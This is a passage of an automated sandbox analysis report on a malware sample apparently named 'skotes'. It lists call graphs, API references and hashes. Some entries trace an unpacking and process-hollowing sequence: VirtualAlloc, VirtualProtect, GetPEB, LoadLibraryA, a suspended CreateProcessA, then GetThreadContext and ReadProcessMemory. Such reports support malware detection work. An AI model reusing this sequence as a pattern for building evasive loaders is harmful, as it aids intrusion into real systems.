                      • Part of subcall function 021A2A99: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 021A2ABC
                      • Part of subcall function 021A2A99: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 021A2ADD
                      • Part of subcall function 021A2A99: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 021A2B46
                      • Part of subcall function 021A2A99: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 021A2CB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
                    • String ID: p[F
                    • API String ID: 3302332639-1832964472
                    • Opcode ID: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
                    • Instruction ID: de91327ecaf2cad193d2b8090c3aee4e6081fc01289ca9105113cdc236e09c19
                    • Opcode Fuzzy Hash: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
                    • Instruction Fuzzy Hash: 28E01A787806019ADF24EBA5F93076933E5AB0DB01F80442AE505CA650EBB5E4008F1A

                    Execution Graph

                    Execution Coverage:0.7%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:28
                    Total number of Limit Nodes:2
                    execution_graph 25657 6ed9fe 25658 6eda0d 25657->25658 25661 6ee19e 25658->25661 25664 6ee1b9 25661->25664 25662 6ee1c2 CreateToolhelp32Snapshot 25663 6ee1de Module32First 25662->25663 25662->25664 25665 6ee1ed 25663->25665 25666 6eda16 25663->25666 25664->25662 25664->25663 25668 6ede5d 25665->25668 25669 6ede88 25668->25669 25670 6ede99 VirtualAlloc 25669->25670 25671 6eded1 25669->25671 25670->25671 25671->25671 25672 217003c 25673 2170049 25672->25673 25687 2170e0f SetErrorMode SetErrorMode 25673->25687 25678 2170265 25679 21702ce VirtualProtect 25678->25679 25681 217030b 25679->25681 25680 2170439 VirtualFree 25682 21704be 25680->25682 25686 21705f4 LoadLibraryA 25680->25686 25681->25680 25683 21704e3 LoadLibraryA 25682->25683 25682->25686 25683->25682 25685 21708c7 25686->25685 25688 2170223 25687->25688 25689 2170d90 25688->25689 25690 2170dad 25689->25690 25691 2170dbb GetPEB 25690->25691 25692 2170238 VirtualAlloc 25690->25692 25691->25692 25692->25678

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 217003c-2170047 1 217004c-2170263 call 2170a3f call 2170e0f call 2170d90 VirtualAlloc 0->1 2 2170049 0->2 17 2170265-2170289 call 2170a69 1->17 18 217028b-2170292 1->18 2->1 23 21702ce-21703c2 VirtualProtect call 2170cce call 2170ce7 17->23 20 21702a1-21702b0 18->20 22 21702b2-21702cc 20->22 20->23 22->20 29 21703d1-21703e0 23->29 30 21703e2-2170437 call 2170ce7 29->30 31 2170439-21704b8 VirtualFree 29->31 30->29 33 21705f4-21705fe 31->33 34 21704be-21704cd 31->34 37 2170604-217060d 33->37 38 217077f-2170789 33->38 36 21704d3-21704dd 34->36 36->33 42 21704e3-2170505 LoadLibraryA 36->42 37->38 43 2170613-2170637 37->43 40 21707a6-21707b0 38->40 41 217078b-21707a3 38->41 44 21707b6-21707cb 40->44 45 217086e-21708be LoadLibraryA 40->45 41->40 46 2170517-2170520 42->46 47 2170507-2170515 42->47 48 217063e-2170648 43->48 49 21707d2-21707d5 44->49 52 21708c7-21708f9 45->52 50 2170526-2170547 46->50 47->50 48->38 51 217064e-217065a 48->51 53 21707d7-21707e0 49->53 54 2170824-2170833 49->54 55 217054d-2170550 50->55 51->38 56 2170660-217066a 51->56 57 2170902-217091d 52->57 58 21708fb-2170901 52->58 59 21707e4-2170822 53->59 60 21707e2 53->60 64 2170839-217083c 54->64 61 2170556-217056b 55->61 62 21705e0-21705ef 55->62 63 217067a-2170689 56->63 58->57 59->49 60->54 68 217056f-217057a 61->68 69 217056d 61->69 62->36 65 2170750-217077a 63->65 66 217068f-21706b2 63->66 64->45 67 217083e-2170847 64->67 65->48 72 21706b4-21706ed 66->72 73 21706ef-21706fc 66->73 74 217084b-217086c 67->74 75 2170849 67->75 70 217057c-2170599 68->70 71 217059b-21705bb 68->71 69->62 83 21705bd-21705db 70->83 71->83 72->73 77 21706fe-2170748 73->77 78 217074b 73->78 74->64 75->45 77->78 78->63 83->55
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0217024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 20d72d97d4b91e157398b5588176fb2569ed1a9d1da1e1fd342d4343e33d2590
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: C7526975A01229DFDB64CF58C984BACBBB1BF49304F1580E9E94DAB351DB30AA85CF14

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 84 6ee19e-6ee1b7 85 6ee1b9-6ee1bb 84->85 86 6ee1bd 85->86 87 6ee1c2-6ee1ce CreateToolhelp32Snapshot 85->87 86->87 88 6ee1de-6ee1eb Module32First 87->88 89 6ee1d0-6ee1d6 87->89 90 6ee1ed-6ee1ee call 6ede5d 88->90 91 6ee1f4-6ee1fc 88->91 89->88 96 6ee1d8-6ee1dc 89->96 94 6ee1f3 90->94 94->91 96->85 96->88
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006EE1C6
                    • Module32First.KERNEL32(00000000,00000224), ref: 006EE1E6
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334468394.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_6ed000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 558c0f5bcc2ee8b56883f7a92dd481ba4e79e2447fded164dfec15c4cb33b7a1
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 6EF0F6356017106BD7203BF6988CBEE72E9AF49725F100538E642D11C0CB71EC858A61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 97 2170e0f-2170e24 SetErrorMode * 2 98 2170e26 97->98 99 2170e2b-2170e2c 97->99 98->99
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,02170223,?,?), ref: 02170E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,02170223,?,?), ref: 02170E1E
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: f6eda14345538900ca3a5bcd661a1e8535e70606a6f2fc7bf9789d366219cde3
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 9DD0123114522877D7002A94DC09BCD7B1CDF09B66F108011FB0DD9080CB70954046E5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 100 6ede5d-6ede97 call 6ee170 103 6ede99-6edecc VirtualAlloc call 6edeea 100->103 104 6edee5 100->104 106 6eded1-6edee3 103->106 104->104 106->104
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006EDEAE
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334468394.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_6ed000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 27330354b3aebb1a11da77978c788e3f8228fe8043678fbdc0d4e70684b2807b
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 94113C79A00208EFDB01DF99C989E99BBF5AF08750F058094F9489B362D371EA90DF80

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02177334
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02177392
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 021773AB
                    • GetThreadContext.KERNEL32(?,00000000), ref: 021773C0
                    • ReadProcessMemory.KERNEL32(?,00458DF8,?,00000004,00000000), ref: 021773E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocContextCreateFileMemoryModuleNameReadThreadVirtual
                    • String ID: VUUU
                    • API String ID: 338953623-2040033107
                    • Opcode ID: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
                    • Instruction ID: ad41b04a683f8b2cf5a3f55afcba4618d61485cd0c2a400bc08a315fe9149f22
                    • Opcode Fuzzy Hash: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
                    • Instruction Fuzzy Hash: 5B51C071684340AFD7109B64DC09F6ABBF9BF84B05F004429FA45EA2D0DBB4E904CF9A
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0219117D
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021911C9
                      • Part of subcall function 021928C4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 021929B7
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02191235
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 02191251
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021912A5
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 021912D2
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02191328
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
                    • Instruction ID: 6c12eaf5e0536ee777638555b09095f52e1615fb41aaa21b4d007f6785cec546
                    • Opcode Fuzzy Hash: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
                    • Instruction Fuzzy Hash: 6DB17CB0A40616BFDF18CF68D990A7EB7B5FF44714F248169D809AB690D370B980CFA5
                    APIs
                      • Part of subcall function 02192F63: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 02192F76
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 0219187B
                      • Part of subcall function 02193076: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 021930A0
                      • Part of subcall function 02193076: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 0219310F
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 021919AD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 02191A0D
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 02191A19
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 02191A54
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 02191A75
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 02191A81
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 02191A8A
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 02191AA2
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 1912fa0d0b8b4f2268570b843f6c2612021e862a7a5d2bc4153c4dfd71d45a57
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: 8F813971E40226AFCF19CFA8C990A6DB7F2FF48704B1546ADD459AB701C770AD82CB90
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0219EEE8
                      • Part of subcall function 02199196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 021991B7
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0219EF4E
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0219EF66
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0219EF73
                      • Part of subcall function 0219EA16: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0219EA3E
                      • Part of subcall function 0219EA16: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0219EAD6
                      • Part of subcall function 0219EA16: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0219EAE0
                      • Part of subcall function 0219EA16: Concurrency::location::_Assign.LIBCMT ref: 0219EB14
                      • Part of subcall function 0219EA16: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0219EB1C
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                    • Instruction ID: b3f5f8dfb72a5616bca4ee0dab818fe02a581a137bb8992099780b001b40fc46
                    • Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                    • Instruction Fuzzy Hash: D8517035A40205AFCF18EF50C894BADB776EF44714F1940AAED066B395CB71AE06CFA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 115 21af5c6-21af5da 116 21af648-21af650 115->116 117 21af5dc-21af5e1 115->117 118 21af652-21af655 116->118 119 21af697-21af6af call 21af737 116->119 117->116 120 21af5e3-21af5e8 117->120 118->119 121 21af657-21af694 call 21ab05c * 4 118->121 128 21af6b2-21af6b9 119->128 120->116 123 21af5ea-21af5ed 120->123 121->119 123->116 126 21af5ef-21af5f7 123->126 129 21af5f9-21af5fc 126->129 130 21af611-21af619 126->130 134 21af6bb-21af6bf 128->134 135 21af6d8-21af6dc 128->135 129->130 136 21af5fe-21af610 call 21ab05c call 21af1a3 129->136 132 21af61b-21af61e 130->132 133 21af633-21af647 call 21ab05c * 2 130->133 132->133 141 21af620-21af632 call 21ab05c call 21af2a1 132->141 133->116 137 21af6c1-21af6c4 134->137 138 21af6d5 134->138 142 21af6de-21af6e3 135->142 143 21af6f4-21af700 135->143 136->130 137->138 145 21af6c6-21af6d4 call 21ab05c * 2 137->145 138->135 141->133 149 21af6f1 142->149 150 21af6e5-21af6e8 142->150 143->128 152 21af702-21af70d call 21ab05c 143->152 145->138 149->143 150->149 158 21af6ea-21af6f0 call 21ab05c 150->158 158->149
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 021AF60A
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF1C0
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF1D2
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF1E4
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF1F6
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF208
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF21A
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF22C
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF23E
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF250
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF262
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF274
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF286
                      • Part of subcall function 021AF1A3: _free.LIBCMT ref: 021AF298
                    • _free.LIBCMT ref: 021AF5FF
                      • Part of subcall function 021AB05C: HeapFree.KERNEL32(00000000,00000000,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?), ref: 021AB072
                      • Part of subcall function 021AB05C: GetLastError.KERNEL32(?,?,021AF334,?,00000000,?,?,?,021AF35B,?,00000007,?,?,021AF75D,?,?), ref: 021AB084
                    • _free.LIBCMT ref: 021AF621
                    • _free.LIBCMT ref: 021AF636
                    • _free.LIBCMT ref: 021AF641
                    • _free.LIBCMT ref: 021AF663
                    • _free.LIBCMT ref: 021AF676
                    • _free.LIBCMT ref: 021AF684
                    • _free.LIBCMT ref: 021AF68F
                    • _free.LIBCMT ref: 021AF6C7
                    • _free.LIBCMT ref: 021AF6CE
                    • _free.LIBCMT ref: 021AF6EB
                    • _free.LIBCMT ref: 021AF703
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: 8"F$`'F
                    • API String ID: 161543041-3117062166
                    • Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                    • Instruction ID: 4458f1e29c31a10ca1bb83f1674346c10f32e0f18374386fff9008f562bdf663
                    • Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                    • Instruction Fuzzy Hash: 6531AE39684700DFEB30AA38D965B5A77EAFF00358F158519E068D79A0DF32E981CF50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 172 218f28f-218f2a0 call 218dba9 175 218f51a-218f527 call 218c350 172->175 176 218f2a6-218f2bd 172->176 185 218f52c 175->185 179 218f2dc-218f2e0 176->179 180 218f2bf-218f2cb 176->180 183 218f2f1-218f2f3 179->183 184 218f2e2-218f2e6 179->184 180->175 186 218f2d1-218f2d2 call 218f0c6 180->186 188 218f2fd 183->188 189 218f2f5-218f2f7 183->189 184->175 187 218f2ec-218f2ef 184->187 190 218f52f-218f535 call 21a3d6b 185->190 186->179 187->183 187->184 194 218f2ff-218f325 call 218e420 188->194 189->188 192 218f2f9-218f2fb 189->192 192->194 198 218f42b-218f434 194->198 199 218f32b-218f331 194->199 201 218f43a-218f446 198->201 202 218f4f3 198->202 200 218f334-218f358 call 218f644 199->200 212 218f35a-218f365 200->212 213 218f396-218f3a8 call 218eb06 200->213 201->202 204 218f44c-218f44e 201->204 205 218f4f6-218f4fb 202->205 209 218f470-218f472 204->209 210 218f450-218f45f 204->210 206 218f50a-218f519 call 218e56c call 218db83 205->206 207 218f4fd-218f508 205->207 207->206 216 218f4ee-218f4f1 209->216 217 218f474-218f47b 209->217 214 218f465-218f46b 210->214 215 218f4e7-218f4ec call 21905cd 210->215 219 218f3d0-218f3d9 call 218e8ae 212->219 220 218f367-218f36e call 218e8ae 212->220 230 218f3aa-218f3c8 call 218f676 213->230 214->205 215->205 216->215 217->216 221 218f47d-218f488 call 21925a7 217->221 236 218f3db 219->236 237 218f3df-218f3e5 219->237 238 218f38a-218f38e 220->238 239 218f370-218f387 call 218eb06 220->239 240 218f48a-218f4a0 call 2190419 221->240 241 218f4b1-218f4d0 call 218e7c8 call 218fe11 221->241 230->200 249 218f3ce 230->249 236->237 244 218f415-218f41c call 218f676 237->244 245 218f3e7-218f3f6 237->245 238->230 247 218f390-218f394 238->247 239->238 258 218f4a2-218f4af call 218ae78 240->258 259 218f4e4 240->259 241->259 264 218f4d2-218f4e2 call 218ae78 241->264 255 218f421-218f425 244->255 251 218f3f8-218f40d call 218e8ae 245->251 247->230 249->255 265 218f40f-218f412 251->265 255->198 255->202 258->185 259->215 264->190 265->244
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0218F296
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0218F522
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog3std::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 1590901807-0
                    • Opcode ID: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
                    • Instruction ID: 44beda76358f041c7a4e768ee135eae9fa66a3fdbd8f287f68a145e6bb82d218
                    • Opcode Fuzzy Hash: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
                    • Instruction Fuzzy Hash: 59819D31D802189FCF25FFA8C8C4BAEB7B6BF45314F64411AE811A7681DB34A946CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 268 21a2938-21a2951 call 21a2748 271 21a295a-21a297f call 2190067 call 21a270f call 21a22c8 268->271 272 21a2953-21a2955 268->272 280 21a29ec-21a29f8 271->280 281 21a2981-21a298b 271->281 273 21a2bca-21a2bcd 272->273 284 21a29fe-21a2a02 280->284 285 21a2b6f-21a2b8f call 21a350e 280->285 282 21a298d 281->282 283 21a29e6-21a29e8 281->283 286 21a29c6-21a29cd call 2196069 282->286 283->280 288 21a2a17 284->288 289 21a2a04-21a2a0b call 219c7ed 284->289 294 21a2bb2-21a2bc6 call 219d226 285->294 295 21a2b91-21a2bac call 2198020 call 21a217e 285->295 302 21a298f-21a2992 286->302 303 21a29cf 286->303 293 21a2a19-21a2a1c 288->293 289->288 300 21a2a0d-21a2a10 289->300 298 21a2a20-21a2a23 293->298 306 21a2bc9 294->306 295->294 328 21a2bae 295->328 304 21a2b6b-21a2b6d 298->304 305 21a2a29-21a2a41 298->305 300->288 310 21a2a12-21a2a15 300->310 307 21a29ae-21a29b2 302->307 308 21a2994-21a29aa call 21a2784 302->308 303->283 304->285 304->306 312 21a2b62-21a2b65 305->312 313 21a2a47-21a2a54 call 21a21f0 305->313 306->273 316 21a29c3 307->316 317 21a29b4-21a29c1 call 21a3697 307->317 325 21a29ac 308->325 326 21a29e2 308->326 310->293 312->298 312->304 323 21a2a6d-21a2a71 313->323 324 21a2a56-21a2a67 call 21a2784 313->324 316->286 317->316 332 21a29d1-21a29df call 21a21ca 317->332 330 21a2a8d-21a2a96 323->330 331 21a2a73-21a2a77 323->331 324->323 339 21a2bd0-21a2bd5 324->339 325->316 326->283 328->294 336 21a2aba-21a2abe 330->336 337 21a2a98-21a2ab4 call 21a2f33 330->337 331->330 335 21a2a79-21a2a87 call 21a22fe 331->335 332->326 335->330 335->339 342 21a2aea-21a2aee 336->342 343 21a2ac0-21a2ae4 call 21a2e37 336->343 337->336 337->339 339->312 345 21a2b1b-21a2b1f 342->345 346 21a2af0-21a2b15 call 21a3041 342->346 343->339 343->342 351 21a2b3e-21a2b59 call 21960da 345->351 352 21a2b21-21a2b24 345->352 346->339 346->345 351->313 359 21a2b5f 351->359 352->351 354 21a2b26-21a2b38 call 21a3628 352->354 354->339 354->351 359->312
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 021A294A
                      • Part of subcall function 021A2748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021A276B
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 021A296B
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 021A2978
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 021A29C6
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 021A2A4D
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 021A2A60
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 021A2AAD
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                    • Instruction ID: 41c40e59b1a2f6a64ccad2708aa73597189a17b9d44be97fdc258a8157e04a97
                    • Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                    • Instruction Fuzzy Hash: B781C338940249AFDF26DFA4C960BFE7B76AF45308F044098EC517B251C772895ADB72

                    Control-flow Graph

                    APIs
                    • __EH_prolog3.LIBCMT ref: 0219474C
                    • ListArray.LIBCONCRT ref: 0219479F
                      • Part of subcall function 02194580: RtlInitializeSListHead.NTDLL(?), ref: 0219464C
                      • Part of subcall function 02194580: RtlInitializeSListHead.NTDLL(?), ref: 02194656
                    • ListArray.LIBCONCRT ref: 021947D3
                    • Hash.LIBCMT ref: 0219483C
                    • Hash.LIBCMT ref: 0219484C
                    • RtlInitializeSListHead.NTDLL(?), ref: 021948E1
                    • RtlInitializeSListHead.NTDLL(?), ref: 021948EE
                    • RtlInitializeSListHead.NTDLL(?), ref: 021948FB
                    • RtlInitializeSListHead.NTDLL(?), ref: 02194908
                      • Part of subcall function 02199EA8: std::bad_exception::bad_exception.LIBCMT ref: 02199ECA
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00427A15,?,000000FF,00000000), ref: 02194990
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 021949B2
                    • GetLastError.KERNEL32(021956F2,?,?,00000000,?,?), ref: 021949C4
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 021949E1
                      • Part of subcall function 0218FE11: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,021956F2,00000008,?,021949E6,?,00000000,00427A06,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0218FE29
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02194A0B
                    Memory Dump Source
